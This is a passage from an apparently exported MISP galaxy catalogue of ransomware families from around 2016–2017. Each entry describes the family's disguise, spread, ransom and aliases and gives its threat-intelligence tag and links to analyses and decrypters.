https://id-ransomware.blogspot.co.il/2017/01/cloudsword.html

http://bestsecuritysearch.com/cloudsword-ransomware-virus-removal-steps-protection-updates/

https://twitter.com/BleepinComputer/status/822653335681593345

DN

It’s directed to English-speaking users and is therefore able to infect worldwide. Uses the name “Chrome Update” to confuse its victims. It then imitates the Chrome update process while encrypting the files. DO NOT pay the ransom, since YOUR COMPUTER WILL NOT BE RESTORED FROM THIS MALWARE!

The tag is: misp-galaxy:ransomware="DN"

DN is also known as:

  • Fake

Table 8001. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/dn-donotopen.html

GarryWeber Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. Its original name is FileSpy and FileSpy Application. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including music, MS Office, etc.

The tag is: misp-galaxy:ransomware="GarryWeber Ransomware"

Table 8002. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/garryweber.html

Satan Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. Its original name is RAAS RANSOMWARE. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, etc. This ransomware invites others to download the malware and spread it as ransomware to infect other users, keeping 70% of the ransom (and leaving the other 30% to Satan). RaaS. Screenshot of the RaaS site: https://3.bp.blogspot.com/-7fwX40eYL18/WH-tfpNjDgI/AAAAAAAADPk/KVP_ji8lR0gENCMYhb324mfzIFFpiaOwACLcB/s1600/site-raas.gif

The tag is: misp-galaxy:ransomware="Satan Ransomware"

Satan Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="Satan" with estimative-language:likelihood-probability="likely"

Table 8003. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/satan-raas.html

https://www.bleepingcomputer.com/forums/t/637811/satan-ransomware-help-support-topic-stn-extension-help-decrypt-fileshtml/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-20th-2017-satan-raas-spora-locky-and-more/

https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/

https://twitter.com/Xylit0l/status/821757718885236740

Havoc

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Havoc"

Havoc is also known as:

  • HavocCrypt Ransomware

Table 8004. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/havoc-ransomware.html

CryptoSweetTooth Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Its fake name is Bitcoin and the maker’s name is Santiago. The encryptor requires .NET Framework 4.5.2 on the victim’s computer.

The tag is: misp-galaxy:ransomware="CryptoSweetTooth Ransomware"

Table 8005. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/cryptosweettooth.html

http://sensorstechforum.com/remove-cryptosweettooth-ransomware-restore-locked-files/

Kaandsona Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The word Kaandsona is Estonian, therefore the creator is probably from Estonia. It crashes before it encrypts.

The tag is: misp-galaxy:ransomware="Kaandsona Ransomware"

Kaandsona Ransomware is also known as:

  • RansomTroll Ransomware

  • Käändsõna Ransomware

Table 8006. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/kaandsona-ransomtroll.html

https://twitter.com/BleepinComputer/status/819927858437099520

LambdaLocker Ransomware

It’s directed to English- and Chinese-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Python ransomware.

The tag is: misp-galaxy:ransomware="LambdaLocker Ransomware"

Table 8007. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/lambdalocker.html

http://cfoc.org/how-to-restore-files-affected-by-the-lambdalocker-ransomware/

NMoreia 2.0 Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="NMoreia 2.0 Ransomware"

NMoreia 2.0 Ransomware is also known as:

  • HakunaMatataRansomware

Table 8008. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/hakunamatata.html

https://id-ransomware.blogspot.co.il/2016_03_01_archive.html

Marlboro Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 0.2 bitcoin; however, there is no point in even trying to pay, since the damage is irreversible: once the ransom is paid the hacker does not decrypt the files. Another name is DeMarlboro and it is written in C++. It pretends to encrypt using RSA-2048 and AES-128 (really it’s just XOR).

The tag is: misp-galaxy:ransomware="Marlboro Ransomware"

Table 8009. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/marlboro.html

https://decrypter.emsisoft.com/marlboro

https://www.bleepingcomputer.com/news/security/marlboro-ransomware-defeated-in-one-day/

Spora Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Sample of a spam email with a malicious attachment: https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/F_bN796ndMYnzfUsgSWMXhRxFf3Ic-HtACLcB/s1600/spam-email.png

The tag is: misp-galaxy:ransomware="Spora Ransomware"

Table 8010. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/spora-ransomware.html

https://blog.gdatasoftware.com/2017/01/29442-spora-worm-and-ransomware

http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/

CryptoKill Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The files get encrypted, but the decrypt key is not available. THERE IS NO POINT IN PAYING THE RANSOM; THE FILES WILL NOT BE RETURNED.

The tag is: misp-galaxy:ransomware="CryptoKill Ransomware"

Table 8011. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cryptokill-ransomware.html

All_Your_Documents Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="All_Your_Documents Ransomware"

Table 8012. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/allyourdocuments-ransomware.html

SerbRansom 2017 Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is $500 in bitcoins. The name of the hacker is R4z0rx0r Serbian Hacker.

The tag is: misp-galaxy:ransomware="SerbRansom 2017 Ransomware"

Table 8013. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/serbransom-2017.html

https://www.bleepingcomputer.com/news/security/ultranationalist-developer-behind-serbransom-ransomware/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-february-10th-2017-serpent-spora-id-ransomware/

https://twitter.com/malwrhunterteam/status/830116190873849856

Fadesoft Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 0.33 bitcoins.

The tag is: misp-galaxy:ransomware="Fadesoft Ransomware"

Table 8014. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/fadesoft-ransomware.html

https://twitter.com/malwrhunterteam/status/829768819031805953

https://twitter.com/malwrhunterteam/status/838700700586684416

HugeMe Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="HugeMe Ransomware"

Table 8015. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/hugeme-ransomware.html

https://www.ozbargain.com.au/node/228888?page=3

https://id-ransomware.blogspot.co.il/2016/04/magic-ransomware.html

DynA-Crypt Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="DynA-Crypt Ransomware"

DynA-Crypt Ransomware is also known as:

  • DynA CryptoLocker Ransomware

Table 8016. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/dyna-crypt-ransomware.html

https://www.bleepingcomputer.com/news/security/dyna-crypt-not-only-encrypts-your-files-but-also-steals-your-info/

Serpent 2017 Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Serpent 2017 Ransomware"

Serpent 2017 Ransomware is also known as:

  • Serpent Danish Ransomware

Table 8017. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/serpent-danish-ransomware.html

Erebus 2017 Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Erebus 2017 Ransomware"

Table 8018. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html

https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/

Cyber Drill Exercise

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="Cyber Drill Exercise "

Cyber Drill Exercise is also known as:

  • Ransomuhahawhere

Table 8019. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/ransomuhahawhere.html

Cancer Ransomware FAKE

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. This is trollware that does not encrypt your files but makes your computer act crazy (like in the video in the link below). It is meant to be annoying and it is hard to erase from your PC, but possible.

The tag is: misp-galaxy:ransomware="Cancer Ransomware FAKE"

Table 8020. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/cancer-ransomware.html

https://www.bleepingcomputer.com/news/security/watch-your-computer-go-bonkers-with-cancer-trollware/

UpdateHost Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Poses as Microsoft Copyright 2017 and requests the ransom in bitcoins.

The tag is: misp-galaxy:ransomware="UpdateHost Ransomware"

Table 8021. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/updatehost-ransomware.html

https://www.bleepingcomputer.com/startups/Windows_Update_Host-16362.html

Nemesis Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 10 bitcoins.

The tag is: misp-galaxy:ransomware="Nemesis Ransomware"

Table 8022. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/nemesis-ransomware.html

Evil Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The KZ domain is used, therefore it is assumed that the decrypter is from Kazakhstan. Coded in JavaScript.

The tag is: misp-galaxy:ransomware="Evil Ransomware"

Evil Ransomware is also known as:

  • File0Locked KZ Ransomware

Table 8023. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/evil-ransomware.html

http://www.enigmasoftware.com/evilransomware-removal/

http://usproins.com/evil-ransomware-is-lurking/

https://twitter.com/jiriatvirlab/status/818443491713884161

https://twitter.com/PolarToffee/status/826508611878793219

Ocelot Ransomware (FAKE RANSOMWARE)

It’s directed to English-speaking users and is therefore able to infect worldwide. This is fake ransomware: your files are not really encrypted, however the attacker does ask for a ransom of 0.03 bitcoins. It is still dangerous even though it is fake, since the attacker still gains access to your computer.

The tag is: misp-galaxy:ransomware="Ocelot Ransomware (FAKE RANSOMWARE)"

Ocelot Ransomware (FAKE RANSOMWARE) is also known as:

  • Ocelot Locker Ransomware

Table 8024. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/ocelot-ransomware.html

https://twitter.com/malwrhunterteam/status/817648547231371264

SkyName Ransomware

It’s directed to Czechoslovakian-speaking users. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="SkyName Ransomware"

SkyName Ransomware is also known as:

  • Blablabla Ransomware

Table 8025. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/skyname-ransomware.html

https://twitter.com/malwrhunterteam/status/817079028725190656

MafiaWare Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is $155 in bitcoins. The creator of the ransomware is called Mafia. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="MafiaWare Ransomware"

MafiaWare Ransomware is also known as:

  • Depsex Ransomware

Table 8026. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/mafiaware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-6th-2017-fsociety-mongodb-pseudo-darkleech-and-more/

https://twitter.com/BleepinComputer/status/817069320937345024

Globe3 Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 3 bitcoins. The extension depends on the config file. It seems Globe is a ransomware kit.

The tag is: misp-galaxy:ransomware="Globe3 Ransomware"

Globe3 Ransomware is also known as:

  • Purge Ransomware

Globe3 Ransomware has relationships with:

  • similar: misp-galaxy:ransomware="Globe2 Ransomware" with estimative-language:likelihood-probability="likely"

Table 8027. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/globe3-ransomware.html

https://www.bleepingcomputer.com/forums/t/624518/globe-ransomware-help-and-support-purge-extension-how-to-restore-fileshta/

https://www.bleepingcomputer.com/news/security/the-globe-ransomware-wants-to-purge-your-files/

https://decryptors.blogspot.co.il/2017/01/globe3-decrypter.html

https://decrypter.emsisoft.com/globe3

BleedGreen Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is $500 in bitcoins. Requires .NET Framework 4.0. It adds itself to your system startup and sends you notes like the one below: https://4.bp.blogspot.com/-xrr6aoB_giw/WG1UrGpmZJI/AAAAAAAAC-Q/KtKdQP6iLY4LHaHgudF5dKs6i1JHQOBmgCLcB/s1600/green1.jpg

The tag is: misp-galaxy:ransomware="BleedGreen Ransomware"

BleedGreen Ransomware is also known as:

  • FireCrypt Ransomware

Table 8028. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/bleedgreen-ransomware.html

https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/

BTCamant Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Its original name is Mission 1996 or Mission: “Impossible” (1996) (like the movie).

The tag is: misp-galaxy:ransomware="BTCamant Ransomware"

Table 8029. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/btcamant.html

X3M Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. It is also possible to break in through Windows RDP with the help of Pass-the-Hash, PuTTY, mRemoteNG, TightVNC, Chrome Remote Desktop, a modified version of TeamViewer, AnyDesk, AmmyyAdmin, LiteManager, Radmin and others. The ransom is $700 in Bitcoins.

The tag is: misp-galaxy:ransomware="X3M Ransomware"

Table 8030. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/x3m-ransomware.html

GOG Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="GOG Ransomware"

Table 8031. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/gog-ransomware.html

https://twitter.com/BleepinComputer/status/816112218815266816

RegretLocker

RegretLocker is a new ransomware that has been found in the wild in the last month and that does not only encrypt normal files on disk like other ransomware. When running, it specifically searches for VHD files, mounts them using the Windows Virtual Storage API, and then encrypts all the files it finds inside those VHD files.

The tag is: misp-galaxy:ransomware="RegretLocker"

Table 8032. Table References

Links

http://chuongdong.com/reverse%20engineering/2020/11/17/RegretLocker/

EdgeLocker

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 0.1 Bitcoins. Its original name is TrojanRansom.

The tag is: misp-galaxy:ransomware="EdgeLocker"

Table 8033. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/edgelocker-ransomware.html

https://twitter.com/BleepinComputer/status/815392891338194945

Red Alert

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Fake name: Microsoft Corporation. Based on HiddenTear.

The tag is: misp-galaxy:ransomware="Red Alert"

Red Alert has relationships with:

  • similar: misp-galaxy:malpedia="Red Alert" with estimative-language:likelihood-probability="likely"

Table 8034. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/red-alert-ransomware.html

https://twitter.com/JaromirHorejsi/status/815557601312329728

First

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="First"

Table 8035. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/first-ransomware.html

XCrypt Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Written in Delphi. The attacker asks the victim to get in touch through ICQ to pay the ransom and get the files back.

The tag is: misp-galaxy:ransomware="XCrypt Ransomware"

XCrypt Ransomware is also known as:

  • XCrypt

Table 8036. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/xcrypt-ransomware.html

https://twitter.com/JakubKroustek/status/825790584971472902

7Zipper Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

The tag is: misp-galaxy:ransomware="7Zipper Ransomware"

Table 8037. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/7zipper-ransomware.html

https://1.bp.blogspot.com/-ClM0LCPjQuk/WI-BgHTpdNI/AAAAAAAADc8/JyEQ8-pcJmsXIntuP-MMdE-pohVncxTXQCLcB/s1600/7-zip-logo.png

Zyka Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 170 USD or EUR in Bitcoins.

The tag is: misp-galaxy:ransomware="Zyka Ransomware"

Table 8038. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/zyka-ransomware.html

https://www.pcrisk.com/removal-guides/10899-zyka-ransomware

https://download.bleepingcomputer.com/demonslay335/StupidDecrypter.zip

https://twitter.com/GrujaRS/status/826153382557712385

SureRansom Ransomeware (Fake)

It’s directed to English-speaking users and is therefore able to strike worldwide. This ransomware does not really encrypt your files. The ransom requested is £50, paid by credit card.

The tag is: misp-galaxy:ransomware="SureRansom Ransomeware (Fake)"

Table 8039. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/sureransom-ransomware.html

http://www.forbes.com/sites/leemathews/2017/01/27/fake-ransomware-is-tricking-people-into-paying/#777faed0381c

Netflix Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. This ransomware uses the well-known online video library as a decoy: it poses as a Netflix code generator for Netflix logins, but instead encrypts your files. The ransom is $100 in Bitcoins.

The tag is: misp-galaxy:ransomware="Netflix Ransomware"

Table 8040. Table References

Links

https://id-ransomware.blogspot.co.il/2017/01/netflix-ransomware.html

http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/

https://www.bleepingcomputer.com/news/security/rogue-netflix-app-spreads-netix-ransomware-that-targets-windows-7-and-10-users/

http://www.darkreading.com/attacks-breaches/netflix-scam-spreads-ransomware/d/d-id/1328012

https://4.bp.blogspot.com/-bQQ4DTIClvA/WJCIh6Uq2nI/AAAAAAAADfY/hB5HcjuGgh8rRJKeLHoIRz3Ezth22-wCEw/s1600/form1.jpg

https://4.bp.blogspot.com/-ZnWdPDprJOg/WJCPeCtP4HI/AAAAAAAADfw/kR0ifI1naSwTAwSuOPiw8ZCPr0tSIz1CgCLcB/s1600/netflix-akk.png

Merry Christmas

It’s directed to English- and Italian-speaking users and is therefore able to infect worldwide. Most attacks are on organizations and servers. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. It poses as a consumer complaint notification coming from the Federal Trade Commission of the USA, with an attached file called “complaint.pdf”. Written in Delphi by the hacker MicrRP.

The tag is: misp-galaxy:ransomware="Merry Christmas"

Merry Christmas is also known as:

  • Merry X-Mas

  • MRCR

Table 8041. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/mrcr1-ransomware.html

https://www.bleepingcomputer.com/news/security/-merry-christmas-ransomware-now-steals-user-private-data-via-diamondfox-malware/

http://www.zdnet.com/article/not-such-a-merry-christmas-the-ransomware-that-also-steals-user-data/

https://www.bleepingcomputer.com/news/security/merry-christmas-ransomware-and-its-dev-comodosecurity-not-bringing-holiday-cheer/

https://decrypter.emsisoft.com/mrcr

Seoirse Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Seoirse is the Irish form of the name George. The ransom is 0.5 Bitcoins.

The tag is: misp-galaxy:ransomware="Seoirse Ransomware"

Table 8042. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/seoirse-ransomware.html

KillDisk Ransomware

It’s directed to English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Every file is encrypted with its own AES key, and that AES key is then encrypted with an RSA-1028 key. Attributed to TeleBots (Sandworm). Goes under a fake name: Update center or Microsoft Update center.

The tag is: misp-galaxy:ransomware="KillDisk Ransomware"

Table 8043. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/killdisk-ransomware.html

https://www.bleepingcomputer.com/news/security/killdisk-ransomware-now-targets-linux-prevents-boot-up-has-faulty-encryption/

https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/

http://www.zdnet.com/article/247000-killdisk-ransomware-demands-a-fortune-forgets-to-unlock-files/

http://www.securityweek.com/destructive-killdisk-malware-turns-ransomware

http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/

https://cyberx-labs.com/en/blog/new-killdisk-malware-brings-ransomware-into-industrial-domain/

DeriaLock Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The maker is arizonacode and the ransom amount is 20-30$. If the victim decides to pay the ransom, he has to copy the HWID, then speak to the hacker on Skype and forward him the payment.

The tag is: misp-galaxy:ransomware="DeriaLock Ransomware"

Table 8044. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html

https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/

BadEncript Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="BadEncript Ransomware"

Table 8045. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/badencript-ransomware.html

https://twitter.com/demonslay335/status/813064189719805952

AdamLocker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The name of the creator is puff69.

The tag is: misp-galaxy:ransomware="AdamLocker Ransomware"

Table 8046. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/adamlocker-ransomware.html

Alphabet Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. This ransomware poses as Windows 10 Critical Update Service. It offers to update your Windows 10, but instead encrypts your files. For a successful attack, the victim must have .NET Framework 4.5.2 installed on his computer.

The tag is: misp-galaxy:ransomware="Alphabet Ransomware"

Alphabet Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="Alphabet Ransomware" with estimative-language:likelihood-probability="likely"

Table 8047. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/alphabet-ransomware.html

https://twitter.com/PolarToffee/status/812331918633172992

KoKoKrypt Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread by its creator in forums. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files, documents and more. The ransom is 0.1 bitcoins within 72 hours. Uses Windows Update as a decoy. Creator: Talnaci Alexandru

The tag is: misp-galaxy:ransomware="KoKoKrypt Ransomware"

KoKoKrypt Ransomware is also known as:

  • KokoLocker Ransomware

Table 8048. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/kokokrypt-ransomware.html

http://removevirusadware.com/tips-for-removeing-kokokrypt-ransomware/

L33TAF Locker Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom is 0.5 bitcoins. The name of the creator is staffttt; he also created Fake CryptoLocker.

The tag is: misp-galaxy:ransomware="L33TAF Locker Ransomware"

Table 8049. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/l33taf-locker-ransomware.html

PClock4 Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam (for example: “you have a criminal case against you”), fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="PClock4 Ransomware"

PClock4 Ransomware is also known as:

  • PClock SysGop Ransomware

Table 8050. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/pclock4-sysgop-ransomware.html

Guster Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. This ransomware uses a VBS script to deliver a voice message as the first few lines of the note.

The tag is: misp-galaxy:ransomware="Guster Ransomware"

Table 8051. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/guster-ransomware.html

https://twitter.com/BleepinComputer/status/812131324979007492

Roga

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The hacker requests the ransom in Play Store cards. https://3.bp.blogspot.com/-ClUef8T55f4/WGKb8U4GeaI/AAAAAAAACzg/UFD0X2sORHYTVRNBSoqd5q7TBrOblQHmgCLcB/s1600/site.png

The tag is: misp-galaxy:ransomware="Roga"

Roga has relationships with:

  • similar: misp-galaxy:ransomware="Free-Freedom" with estimative-language:likelihood-probability="likely"

Table 8052. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/roga-ransomware.html

CryptoLocker3 Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The creator is staffttt and the ransom is 0.5 bitcoins.

The tag is: misp-galaxy:ransomware="CryptoLocker3 Ransomware"

CryptoLocker3 Ransomware is also known as:

  • Fake CryptoLocker

Table 8053. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/cryptolocker3-ransomware.html

ProposalCrypt Ransomware

It’s directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom is 1.0 bitcoins.

The tag is: misp-galaxy:ransomware="ProposalCrypt Ransomware"

Table 8054. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/proposalcrypt-ransomware.html

http://www.archersecuritygroup.com/what-is-ransomware/

https://twitter.com/demonslay335/status/812002960083394560

